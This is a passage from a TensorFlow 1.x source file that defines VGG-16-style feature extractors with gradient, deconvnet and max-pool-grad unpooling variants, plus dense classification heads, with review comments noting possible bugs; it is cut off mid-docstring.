        grads_dict['pool4'] = tf.gradients(pool2, pool1, grads_dict['pool4'])
        grads_dict['pool4'] = tf.nn.relu(grads_dict['pool4'][0]) + tf.nn.relu(-grads_dict['pool4'][0])
        grads_dict['pool4'] = tf.gradients(pool1, images, grads_dict['pool4'])
        ## grad for 5
        # NOTE(review): same pattern here -- identity hop pool5 -> pool5, then
        # pool5 -> pool3 skipping the pool4 level; verify intended.
        grads_dict['pool5'] = tf.gradients(pool5, pool5, pool5)
        grads_dict['pool5'] = tf.nn.relu(grads_dict['pool5'][0]) + tf.nn.relu(-grads_dict['pool5'][0])
        grads_dict['pool5'] = tf.gradients(pool5, pool3, grads_dict['pool5'])
        grads_dict['pool5'] = tf.nn.relu(grads_dict['pool5'][0]) + tf.nn.relu(-grads_dict['pool5'][0])
        grads_dict['pool5'] = tf.gradients(pool3, pool2, grads_dict['pool5'])
        grads_dict['pool5'] = tf.nn.relu(grads_dict['pool5'][0]) + tf.nn.relu(-grads_dict['pool5'][0])
        grads_dict['pool5'] = tf.gradients(pool2, pool1, grads_dict['pool5'])
        grads_dict['pool5'] = tf.nn.relu(grads_dict['pool5'][0]) + tf.nn.relu(-grads_dict['pool5'][0])
        grads_dict['pool5'] = tf.gradients(pool1, images, grads_dict['pool5'])
    # same as backprop so maybe tf implements relu backprop using deconv
    if DECONV:
        # Deconvnet variant: keep only positive gradients at each hop.
        # NOTE(review): the *(grads>0) lines share the list-vs-0 comparison
        # issue flagged in the GUIDED_BACKPROP branch above (tf.gradients
        # returns a list); dead code while DECONV is False.
        grads_dict['pool1_raw'] = tf.gradients(pool1, images, pool1)
        grads_dict['pool2_raw'] = tf.gradients(pool2, images, pool2)
        grads_dict['pool3_raw'] = tf.gradients(pool3, images, pool3)
        grads_dict['pool4_raw'] = tf.gradients(pool4, images, pool4)
        grads_dict['pool5_raw'] = tf.gradients(pool5, images, pool5)
        # grad for 1
        grads_dict['pool1'] = tf.gradients(pool1, images, pool1)
        grads_dict['pool1'] = grads_dict['pool1']*(grads_dict['pool1']>0)
        # grad for 2
        grads_dict['pool2'] = tf.gradients(pool2, pool1, pool2)
        grads_dict['pool2'] = grads_dict['pool2']*(grads_dict['pool2']>0)
        grads_dict['pool2'] = tf.gradients(pool1, images, grads_dict['pool2'])
        grads_dict['pool2'] = grads_dict['pool2']*(grads_dict['pool2']>0)
        # grad for 3
        grads_dict['pool3'] = tf.gradients(pool3, pool2, pool3)
        grads_dict['pool3'] = grads_dict['pool3']*(grads_dict['pool3']>0)
        grads_dict['pool3'] = tf.gradients(pool2, pool1, grads_dict['pool3'])
        grads_dict['pool3'] = grads_dict['pool3']*(grads_dict['pool3']>0)
        grads_dict['pool3'] = tf.gradients(pool1, images, grads_dict['pool3'])
        grads_dict['pool3'] = grads_dict['pool3']*(grads_dict['pool3']>0)
        # grad for 4
        grads_dict['pool4'] = tf.gradients(pool4, pool3, pool4)
        grads_dict['pool4'] = grads_dict['pool4']*(grads_dict['pool4']>0)
        grads_dict['pool4'] = tf.gradients(pool3, pool2, grads_dict['pool4'])
        grads_dict['pool4'] = grads_dict['pool4']*(grads_dict['pool4']>0)
        grads_dict['pool4'] = tf.gradients(pool2, pool1, grads_dict['pool4'])
        grads_dict['pool4'] = grads_dict['pool4']*(grads_dict['pool4']>0)
        grads_dict['pool4'] = tf.gradients(pool1, images, grads_dict['pool4'])
        grads_dict['pool4'] = grads_dict['pool4']*(grads_dict['pool4']>0)
        # grad for 5
        grads_dict['pool5'] = tf.gradients(pool5, pool4, pool5)
        grads_dict['pool5'] = grads_dict['pool5']*(grads_dict['pool5']>0)
        grads_dict['pool5'] = tf.gradients(pool4, pool3, grads_dict['pool5'])
        grads_dict['pool5'] = grads_dict['pool5']*(grads_dict['pool5']>0)
        grads_dict['pool5'] = tf.gradients(pool3, pool2, grads_dict['pool5'])
        grads_dict['pool5'] = grads_dict['pool5']*(grads_dict['pool5']>0)
        grads_dict['pool5'] = tf.gradients(pool2, pool1, grads_dict['pool5'])
        grads_dict['pool5'] = grads_dict['pool5']*(grads_dict['pool5']>0)
        grads_dict['pool5'] = tf.gradients(pool1, images, grads_dict['pool5'])
        grads_dict['pool5'] = grads_dict['pool5']*(grads_dict['pool5']>0)
    return feat, grads_dict
def model_grad_prev(images, is_training, reuse=False):
""" Gradient of feature map with their respect to the previous feature map
Args:
images: [batch)size, H, W, C]
is_training: True if traning mode (for batchnorm)
"""
if not reuse:
print('inference::input', images.get_shape())
bn = False
grads_dict = {}
argmax = {}
feat = {}
with tf.variable_scope('conv1_1', reuse=reuse) as scope: #1
conv1_1 = tf.layers.conv2d(inputs=images, filters=64, kernel_size=(3,3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv1_1 = tf.contrib.layers.batch_norm(conv1_1, fused=True, decay=0.9, is_training=is_training)
conv1_1 = tf.nn.relu(conv1_1)
if not reuse:
print('conv1_1', conv1_1.get_shape())
with tf.variable_scope('conv1_2', reuse=reuse) as scope: #2
conv1_2 = tf.layers.conv2d(inputs=conv1_1, filters=64, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv1_2 = tf.contrib.layers.batch_norm(conv1_2, fused=True, decay=0.9, is_training=is_training)
conv1_2 = tf.nn.relu(conv1_2)
pool1 = tf.nn.max_pool(conv1_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool1
#pool1,argmax['pool1'] = tf.nn.max_pool_with_argmax(conv1_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool1
if not reuse:
print('pool1', pool1.get_shape())
#feat['pool1'] = pool1
with tf.variable_scope('conv2_1', reuse=reuse) as scope:#3
conv2_1 = tf.layers.conv2d(inputs=pool1, filters=128, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv2_1 = tf.contrib.layers.batch_norm(conv2_1, fused=True, decay=0.9, is_training=is_training)
conv2_1 = tf.nn.relu(conv2_1)
if not reuse:
print('conv2_1', conv2_1.get_shape())
with tf.variable_scope('conv2_2', reuse=reuse) as scope:#4
conv2_2 = tf.layers.conv2d(inputs=conv2_1, filters=128, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv2_2 = tf.contrib.layers.batch_norm(conv2_2, fused=True, decay=0.9, is_training=is_training)
conv2_2 = tf.nn.relu(conv2_2)
pool2 = tf.nn.max_pool(conv2_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool2
#pool2, argmax['pool2'] = tf.nn.max_pool_with_argmax(conv2_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool2
if not reuse:
print('pool2', pool2.get_shape())
with tf.variable_scope('conv3_1', reuse=reuse) as scope:#5
conv3_1 = tf.layers.conv2d(inputs=pool2, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_1 = tf.contrib.layers.batch_norm(conv3_1, fused=True, decay=0.9, is_training=is_training)
conv3_1 = tf.nn.relu(conv3_1)
if not reuse:
print('conv3_1', conv3_1.get_shape())
with tf.variable_scope('conv3_2', reuse=reuse) as scope:#6
conv3_2 = tf.layers.conv2d(inputs=conv3_1, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_2 = tf.contrib.layers.batch_norm(conv3_2, fused=True, decay=0.9, is_training=is_training)
conv3_2 = tf.nn.relu(conv3_2)
if not reuse:
print('conv3_2', conv3_2.get_shape())
with tf.variable_scope('conv3_3', reuse=reuse) as scope:#7
conv3_3 = tf.layers.conv2d(inputs=conv3_2, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_3 = tf.contrib.layers.batch_norm(conv3_3, fused=True, decay=0.9, is_training=is_training)
conv3_3 = tf.nn.relu(conv3_3)
pool3 = tf.nn.max_pool(conv3_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool3
#pool3, argmax['pool3'] = tf.nn.max_pool_with_argmax(conv3_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool3
if not reuse:
print('pool3', pool3.get_shape())
with tf.variable_scope('conv4_1', reuse=reuse) as scope:# 8
conv4_1 = tf.layers.conv2d(inputs=pool3, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_1 = tf.contrib.layers.batch_norm(conv4_1, fused=True, decay=0.9, is_training=is_training)
conv4_1 = tf.nn.relu(conv4_1)
if not reuse:
print('conv4_1', conv4_1.get_shape())
with tf.variable_scope('conv4_2', reuse=reuse) as scope:#9
conv4_2 = tf.layers.conv2d(inputs=conv4_1, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_2 = tf.contrib.layers.batch_norm(conv4_2, fused=True, decay=0.9, is_training=is_training)
conv4_2 = tf.nn.relu(conv4_2)
if not reuse:
print('conv4_2', conv4_2.get_shape())
with tf.variable_scope('conv4_3', reuse=reuse) as scope:#10
conv4_3 = tf.layers.conv2d(inputs=conv4_2, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_3 = tf.contrib.layers.batch_norm(conv4_3, fused=True, decay=0.9, is_training=is_training)
conv4_3 = tf.nn.relu(conv4_3)
pool4 = tf.nn.max_pool(conv4_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool4
#pool4, argmax['pool4'] = tf.nn.max_pool_with_argmax(conv4_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool4
if not reuse:
print('pool4', pool4.get_shape())
with tf.variable_scope('conv5_1', reuse=reuse) as scope:#11
conv5_1 = tf.layers.conv2d(inputs=pool4, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv5_1 = tf.contrib.layers.batch_norm(conv5_1, fused=True, decay=0.9, is_training=is_training)
conv5_1 = tf.nn.relu(conv5_1)
if not reuse:
print('conv5_1', conv5_1.get_shape())
with tf.variable_scope('conv5_2', reuse=reuse) as scope:#12
conv5_2 = tf.layers.conv2d(inputs=conv5_1, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv5_2 = tf.contrib.layers.batch_norm(conv5_2, fused=True, decay=0.9, is_training=is_training)
conv5_2 = tf.nn.relu(conv5_2)
if not reuse:
print('conv5_2', conv5_2.get_shape())
with tf.variable_scope('conv5_3', reuse=reuse) as scope:#13
conv5_3 = tf.layers.conv2d(inputs=conv5_2, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv5_3 = tf.contrib.layers.batch_norm(conv5_3, fused=True, decay=0.9, is_training=is_training)
conv5_3 = tf.nn.relu(conv5_3)
pool5 = tf.nn.max_pool(conv5_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool5
#pool5, argmax['pool5'] = tf.nn.max_pool_with_argmax(conv5_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool5
if not reuse:
print('pool5', pool5.get_shape())
feat['pool1'] = pool1
feat['pool2'] = pool2
feat['pool3'] = pool3
feat['pool4'] = pool4
feat['pool5'] = pool5
grads_dict['conv1_1'] = tf.gradients(conv1_1, images, conv1_1)
grads_dict['conv1_2'] = tf.gradients(conv1_2, conv1_1, conv1_2)
grads_dict['pool1'] = tf.gradients(pool1, conv1_2, pool1)
grads_dict['conv2_1'] = tf.gradients(conv2_1, pool1, conv2_1)
grads_dict['conv2_2'] = tf.gradients(conv2_2, conv2_1, conv2_2)
grads_dict['pool2'] = tf.gradients(pool2, conv2_2, pool2)
grads_dict['conv3_1'] = tf.gradients(conv3_1, pool2, conv3_1)
grads_dict['conv3_2'] = tf.gradients(conv3_2, conv3_1, conv3_2)
grads_dict['conv3_3'] = tf.gradients(conv3_3, conv3_2, conv3_3)
grads_dict['pool3'] = tf.gradients(pool3, conv3_3, pool3)
grads_dict['conv4_1'] = tf.gradients(conv4_1, pool3, conv4_1)
grads_dict['conv4_2'] = tf.gradients(conv4_2, conv4_1, conv4_2)
grads_dict['conv4_3'] = tf.gradients(conv4_3, conv4_2, conv4_3)
grads_dict['pool4'] = tf.gradients(pool4, conv4_3, pool4)
grads_dict['conv5_1'] = tf.gradients(conv5_1, pool4, conv5_1)
grads_dict['conv5_2'] = tf.gradients(conv5_2, conv5_1, conv5_2)
grads_dict['conv5_3'] = tf.gradients(conv5_3, conv5_2, conv5_3)
grads_dict['pool5'] = tf.gradients(pool5, conv5_2, pool5)
return feat, grads_dict
def model_nopool(images, is_training, reuse=False):
    """VGG-16-style feature extractor with the max-pool layers removed.

    The ``pool*`` names are kept for interface parity with ``model``, but
    here each "pool" tensor is simply the ReLU output of the corresponding
    conv layer (no spatial downsampling).

    Args:
        images: 4-D image tensor ``[batch, H, W, C]``.
        is_training: batch-norm mode flag; batch norm is currently disabled
            via the local ``bn`` switch, so this is unused in practice.
        reuse: whether to reuse variables in the ``tf.variable_scope``s.

    Returns:
        (feat, grads_dict): ``feat`` maps 'pool1'..'pool4' to activation
        tensors; ``grads_dict`` is an empty dict kept for interface parity
        with ``model`` (the original docstring incorrectly said "Logits").
    """
    # Consistency fix: gate prints on `not reuse` like the sibling models,
    # so graph construction under reuse stays quiet.
    if not reuse:
        print('inference::input', images.get_shape())
    bn = False  # batch norm intentionally disabled in this variant
    feat, grads_dict = {}, {}

    with tf.variable_scope('conv1_1', reuse=reuse):  # 1
        conv1_1 = tf.layers.conv2d(inputs=images, filters=64, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv1_1 = tf.contrib.layers.batch_norm(conv1_1, fused=True, decay=0.9,
                                                   is_training=is_training)
        conv1_1 = tf.nn.relu(conv1_1)
        if not reuse:
            print('conv1_1', conv1_1.get_shape())

    with tf.variable_scope('conv1_2', reuse=reuse):  # 2
        conv1_2 = tf.layers.conv2d(inputs=conv1_1, filters=64, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv1_2 = tf.contrib.layers.batch_norm(conv1_2, fused=True, decay=0.9,
                                                   is_training=is_training)
        # No max-pool in this variant: "pool1" is just the activation.
        pool1 = tf.nn.relu(conv1_2)
        if not reuse:
            print('pool1', pool1.get_shape())

    with tf.variable_scope('conv2_1', reuse=reuse):  # 3
        conv2_1 = tf.layers.conv2d(inputs=pool1, filters=128, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv2_1 = tf.contrib.layers.batch_norm(conv2_1, fused=True, decay=0.9,
                                                   is_training=is_training)
        conv2_1 = tf.nn.relu(conv2_1)
        if not reuse:
            print('conv2_1', conv2_1.get_shape())

    with tf.variable_scope('conv2_2', reuse=reuse):  # 4
        conv2_2 = tf.layers.conv2d(inputs=conv2_1, filters=128, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv2_2 = tf.contrib.layers.batch_norm(conv2_2, fused=True, decay=0.9,
                                                   is_training=is_training)
        pool2 = tf.nn.relu(conv2_2)
        if not reuse:
            print('pool2', pool2.get_shape())

    with tf.variable_scope('conv3_1', reuse=reuse):  # 5
        conv3_1 = tf.layers.conv2d(inputs=pool2, filters=256, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv3_1 = tf.contrib.layers.batch_norm(conv3_1, fused=True, decay=0.9,
                                                   is_training=is_training)
        conv3_1 = tf.nn.relu(conv3_1)
        if not reuse:
            print('conv3_1', conv3_1.get_shape())

    with tf.variable_scope('conv3_2', reuse=reuse):  # 6
        conv3_2 = tf.layers.conv2d(inputs=conv3_1, filters=256, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv3_2 = tf.contrib.layers.batch_norm(conv3_2, fused=True, decay=0.9,
                                                   is_training=is_training)
        conv3_2 = tf.nn.relu(conv3_2)
        if not reuse:
            print('conv3_2', conv3_2.get_shape())

    with tf.variable_scope('conv3_3', reuse=reuse):  # 7
        conv3_3 = tf.layers.conv2d(inputs=conv3_2, filters=256, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv3_3 = tf.contrib.layers.batch_norm(conv3_3, fused=True, decay=0.9,
                                                   is_training=is_training)
        pool3 = tf.nn.relu(conv3_3)
        if not reuse:
            print('pool3', pool3.get_shape())

    with tf.variable_scope('conv4_1', reuse=reuse):  # 8
        conv4_1 = tf.layers.conv2d(inputs=pool3, filters=512, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv4_1 = tf.contrib.layers.batch_norm(conv4_1, fused=True, decay=0.9,
                                                   is_training=is_training)
        conv4_1 = tf.nn.relu(conv4_1)
        if not reuse:
            print('conv4_1', conv4_1.get_shape())

    with tf.variable_scope('conv4_2', reuse=reuse):  # 9
        conv4_2 = tf.layers.conv2d(inputs=conv4_1, filters=512, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv4_2 = tf.contrib.layers.batch_norm(conv4_2, fused=True, decay=0.9,
                                                   is_training=is_training)
        conv4_2 = tf.nn.relu(conv4_2)
        if not reuse:
            print('conv4_2', conv4_2.get_shape())

    with tf.variable_scope('conv4_3', reuse=reuse):  # 10
        conv4_3 = tf.layers.conv2d(inputs=conv4_2, filters=512, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv4_3 = tf.contrib.layers.batch_norm(conv4_3, fused=True, decay=0.9,
                                                   is_training=is_training)
        pool4 = tf.nn.relu(conv4_3)
        if not reuse:
            print('pool4', pool4.get_shape())

    # conv5_* layers of the original VGG are intentionally omitted here.
    # (Duplicate feat['pool3'] assignment from the original was removed.)
    feat['pool1'] = pool1
    feat['pool2'] = pool2
    feat['pool3'] = pool3
    feat['pool4'] = pool4
    return feat, grads_dict
def model_unpool(images, idx_map, is_training, reuse=False):
    """VGG-16 encoder followed by a max-pool-grad "unpooling" decoder.

    The decoder uses ``gen_nn_ops._max_pool_grad`` to route the pool5 signal
    back through each pooling stage to input resolution (DeconvNet-style
    switch unpooling).

    Args:
        images: 4-D image tensor ``[batch_size, H, W, C]`` (fixed typo:
            original docstring said "[batch)size").
        idx_map: currently unused; kept for interface compatibility (an
            earlier variant fed precomputed pooling indices here).
        is_training: True in training mode (controls batch norm).
        reuse: whether to reuse variables in the ``tf.variable_scope``s.

    Returns:
        (feat, unpool, grads_dict): ``feat`` is the pool5 tensor, ``unpool``
        is the single-channel decoded map (channel-wise max of unpool1), and
        ``grads_dict`` maps layer names to ``tf.gradients(layer, images)``.
    """
    if not reuse:
        print('inference::input', images.get_shape())
    bn = True
    grads_dict = {}

    with tf.variable_scope('conv1_1', reuse=reuse):  # 1
        conv1_1 = tf.layers.conv2d(inputs=images, filters=64, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv1_1 = tf.contrib.layers.batch_norm(conv1_1, fused=True, decay=0.9,
                                                   is_training=is_training)
        conv1_1 = tf.nn.relu(conv1_1)
        if not reuse:
            print('conv1_1', conv1_1.get_shape())
        # Gradients are registered unconditionally so the returned dict is
        # populated even when reuse=True.
        grads_dict['conv1_1'] = tf.gradients(conv1_1, images)

    with tf.variable_scope('conv1_2', reuse=reuse):  # 2
        conv1_2 = tf.layers.conv2d(inputs=conv1_1, filters=64, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv1_2 = tf.contrib.layers.batch_norm(conv1_2, fused=True, decay=0.9,
                                                   is_training=is_training)
        conv1_2 = tf.nn.relu(conv1_2)
        pool1 = tf.nn.max_pool(conv1_2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
                               padding='VALID', name='pool')  # pool1
        if not reuse:
            print('pool1', pool1.get_shape())
        grads_dict['conv1_2'] = tf.gradients(conv1_2, images)
        grads_dict['pool1'] = tf.gradients(pool1, images)

    with tf.variable_scope('conv2_1', reuse=reuse):  # 3
        conv2_1 = tf.layers.conv2d(inputs=pool1, filters=128, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv2_1 = tf.contrib.layers.batch_norm(conv2_1, fused=True, decay=0.9,
                                                   is_training=is_training)
        conv2_1 = tf.nn.relu(conv2_1)
        if not reuse:
            print('conv2_1', conv2_1.get_shape())
        grads_dict['conv2_1'] = tf.gradients(conv2_1, images)

    with tf.variable_scope('conv2_2', reuse=reuse):  # 4
        conv2_2 = tf.layers.conv2d(inputs=conv2_1, filters=128, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv2_2 = tf.contrib.layers.batch_norm(conv2_2, fused=True, decay=0.9,
                                                   is_training=is_training)
        conv2_2 = tf.nn.relu(conv2_2)
        pool2 = tf.nn.max_pool(conv2_2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
                               padding='VALID', name='pool')  # pool2
        if not reuse:
            print('pool2', pool2.get_shape())
        grads_dict['conv2_2'] = tf.gradients(conv2_2, images)
        grads_dict['pool2'] = tf.gradients(pool2, images)

    with tf.variable_scope('conv3_1', reuse=reuse):  # 5
        conv3_1 = tf.layers.conv2d(inputs=pool2, filters=256, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv3_1 = tf.contrib.layers.batch_norm(conv3_1, fused=True, decay=0.9,
                                                   is_training=is_training)
        conv3_1 = tf.nn.relu(conv3_1)
        if not reuse:
            print('conv3_1', conv3_1.get_shape())
        grads_dict['conv3_1'] = tf.gradients(conv3_1, images)

    with tf.variable_scope('conv3_2', reuse=reuse):  # 6
        conv3_2 = tf.layers.conv2d(inputs=conv3_1, filters=256, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv3_2 = tf.contrib.layers.batch_norm(conv3_2, fused=True, decay=0.9,
                                                   is_training=is_training)
        conv3_2 = tf.nn.relu(conv3_2)
        if not reuse:
            print('conv3_2', conv3_2.get_shape())
        grads_dict['conv3_2'] = tf.gradients(conv3_2, images)

    with tf.variable_scope('conv3_3', reuse=reuse):  # 7
        conv3_3 = tf.layers.conv2d(inputs=conv3_2, filters=256, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv3_3 = tf.contrib.layers.batch_norm(conv3_3, fused=True, decay=0.9,
                                                   is_training=is_training)
        conv3_3 = tf.nn.relu(conv3_3)
        pool3 = tf.nn.max_pool(conv3_3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
                               padding='VALID', name='pool')  # pool3
        if not reuse:
            print('pool3', pool3.get_shape())
        grads_dict['conv3_3'] = tf.gradients(conv3_3, images)
        grads_dict['pool3'] = tf.gradients(pool3, images)

    with tf.variable_scope('conv4_1', reuse=reuse):  # 8
        conv4_1 = tf.layers.conv2d(inputs=pool3, filters=512, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv4_1 = tf.contrib.layers.batch_norm(conv4_1, fused=True, decay=0.9,
                                                   is_training=is_training)
        conv4_1 = tf.nn.relu(conv4_1)
        if not reuse:
            print('conv4_1', conv4_1.get_shape())
        grads_dict['conv4_1'] = tf.gradients(conv4_1, images)

    with tf.variable_scope('conv4_2', reuse=reuse):  # 9
        conv4_2 = tf.layers.conv2d(inputs=conv4_1, filters=512, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv4_2 = tf.contrib.layers.batch_norm(conv4_2, fused=True, decay=0.9,
                                                   is_training=is_training)
        conv4_2 = tf.nn.relu(conv4_2)
        if not reuse:
            print('conv4_2', conv4_2.get_shape())
        grads_dict['conv4_2'] = tf.gradients(conv4_2, images)

    with tf.variable_scope('conv4_3', reuse=reuse):  # 10
        conv4_3 = tf.layers.conv2d(inputs=conv4_2, filters=512, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv4_3 = tf.contrib.layers.batch_norm(conv4_3, fused=True, decay=0.9,
                                                   is_training=is_training)
        conv4_3 = tf.nn.relu(conv4_3)
        pool4 = tf.nn.max_pool(conv4_3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
                               padding='VALID', name='pool')  # pool4
        if not reuse:
            print('pool4', pool4.get_shape())
        grads_dict['conv4_3'] = tf.gradients(conv4_3, images)
        grads_dict['pool4'] = tf.gradients(pool4, images)

    with tf.variable_scope('conv5_1', reuse=reuse):  # 11
        conv5_1 = tf.layers.conv2d(inputs=pool4, filters=512, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv5_1 = tf.contrib.layers.batch_norm(conv5_1, fused=True, decay=0.9,
                                                   is_training=is_training)
        conv5_1 = tf.nn.relu(conv5_1)
        if not reuse:
            print('conv5_1', conv5_1.get_shape())
        grads_dict['conv5_1'] = tf.gradients(conv5_1, images)

    with tf.variable_scope('conv5_2', reuse=reuse):  # 12
        conv5_2 = tf.layers.conv2d(inputs=conv5_1, filters=512, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv5_2 = tf.contrib.layers.batch_norm(conv5_2, fused=True, decay=0.9,
                                                   is_training=is_training)
        conv5_2 = tf.nn.relu(conv5_2)
        if not reuse:
            print('conv5_2', conv5_2.get_shape())
        grads_dict['conv5_2'] = tf.gradients(conv5_2, images)

    with tf.variable_scope('conv5_3', reuse=reuse):  # 13
        conv5_3 = tf.layers.conv2d(inputs=conv5_2, filters=512, kernel_size=(3, 3),
                                   padding="same",
                                   kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv5_3 = tf.contrib.layers.batch_norm(conv5_3, fused=True, decay=0.9,
                                                   is_training=is_training)
        conv5_3 = tf.nn.relu(conv5_3)
        pool5 = tf.nn.max_pool(conv5_3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
                               padding='VALID', name='pool')  # pool5
        if not reuse:
            print('pool5', pool5.get_shape())
        grads_dict['conv5_3'] = tf.gradients(conv5_3, images)
        grads_dict['pool5'] = tf.gradients(pool5, images)

    ####################################################################
    # Decoder: MaxPoolGrad acts as switch unpooling — it scatters each
    # incoming value back to the argmax location of the matching forward
    # max-pool (orig_input=conv, orig_output=pool, grad=signal).
    ####################################################################
    with tf.variable_scope('unpool5', reuse=reuse):  # 14
        unpool5 = gen_nn_ops._max_pool_grad(conv5_3, pool5, pool5,
                                            [1, 2, 2, 1], [1, 2, 2, 1], 'VALID')
        if not reuse:
            print('unpool5', unpool5.get_shape())

    with tf.variable_scope('unpool4', reuse=reuse):  # 17
        unpool4 = gen_nn_ops._max_pool_grad(conv4_3, pool4, unpool5,
                                            [1, 2, 2, 1], [1, 2, 2, 1], 'VALID')
        if not reuse:
            print('unpool4', unpool4.get_shape())

    with tf.variable_scope('unpool3', reuse=reuse):  # 20
        unpool3 = gen_nn_ops._max_pool_grad(conv3_3, pool3, unpool4,
                                            [1, 2, 2, 1], [1, 2, 2, 1], 'VALID')
        if not reuse:
            print('unpool3', unpool3.get_shape())

    with tf.variable_scope('unpool2', reuse=reuse):  # 23
        unpool2 = gen_nn_ops._max_pool_grad(conv2_2, pool2, unpool3,
                                            [1, 2, 2, 1], [1, 2, 2, 1], 'VALID')
        if not reuse:
            print('unpool2', unpool2.get_shape())

    with tf.variable_scope('unpool1', reuse=reuse):  # 25
        unpool1 = gen_nn_ops._max_pool_grad(conv1_2, pool1, unpool2,
                                            [1, 2, 2, 1], [1, 2, 2, 1], 'VALID')
        # Collapse channels to a single saliency-style map.
        # NOTE(review): keep_dims is the TF1 spelling (keepdims in TF2).
        unpool1 = tf.reduce_max(unpool1, (3), keep_dims=True)
        if not reuse:
            print('unpool1', unpool1.get_shape())

    feat = pool5
    unpool = unpool1
    return feat, unpool, grads_dict
def logits(feat1, feat2, reuse=False):
    """Two-layer classification head over a pair of feature vectors.

    Concatenates ``feat1`` and ``feat2`` along axis 1, then applies two
    ReLU dense layers (1000 units, then 2 output units).
    """
    merged = tf.concat((feat1, feat2), 1)
    print('logits_classif::feat.shape: ', merged.get_shape())
    with tf.variable_scope('fc9', reuse=reuse):
        hidden = tf.nn.relu(tf.layers.dense(merged, 1000))
        print('fc9', hidden.get_shape())
    with tf.variable_scope('fc10', reuse=reuse):
        scores = tf.nn.relu(tf.layers.dense(hidden, 2))
        print('fc10', scores.get_shape())
    return scores
def vgg_logits(pool5, reuse=False):
    """VGG-style fully-connected head on top of pool5.

    Flattens ``pool5`` and applies three ReLU dense layers
    (4096 -> 1000 -> 1000).

    Bug fixes vs. the original:
      * ``reuse`` was referenced inside the function but never defined,
